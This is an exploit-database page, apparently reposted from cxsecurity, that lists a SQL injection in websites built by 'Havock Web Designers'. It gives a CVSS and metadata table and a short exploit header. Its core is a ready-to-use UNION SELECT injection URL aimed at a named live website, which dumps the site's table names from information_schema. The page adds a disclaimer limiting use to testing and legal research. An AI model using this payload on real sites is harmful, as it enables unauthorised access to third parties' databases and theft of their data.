Advertisement






Developed By Havock Web Designers - SQL Injection

CVE Category Price Severity
CWE-89 $500 High
Author Risk Exploitation Type Date
Havock Web Designers Critical Remote 2020-11-18
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110141

Below is a copy:

Developed By Havock Web Designers - SQL Injection
---------------------------------------------------------
# Exploit Title: Developed By Havock Web Designers - SQL Injection
# Google Dork: N/A
# Date: 2020-11-17
# Exploit Author: Backdoor Security Research
# Contact us : [email protected]
# Vendor Homepage: http://www.phoenixweb.in/
# Software Link: http://www.phoenixweb.in/
# Version: -
# Tested on: Ubuntu
# CVE : N/A
---------------------------------------------------------

Demo:

http://tasis.in/newsdetail.php?pid=768[SQL Injection]
http://tasis.in/newsdetail.php?pid=-768%27+Union+Select+1,Group_Concat(table_name),3,4,5,6,7,8+from+Information_schema.tables--+
----------------------------------------------------------
# Discovred : Unkn0wn ([email protected])
# Visit: https://t.me/BackdoorTm
#
# "Backdoor Security Research" Part of " Backdoor Team "

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum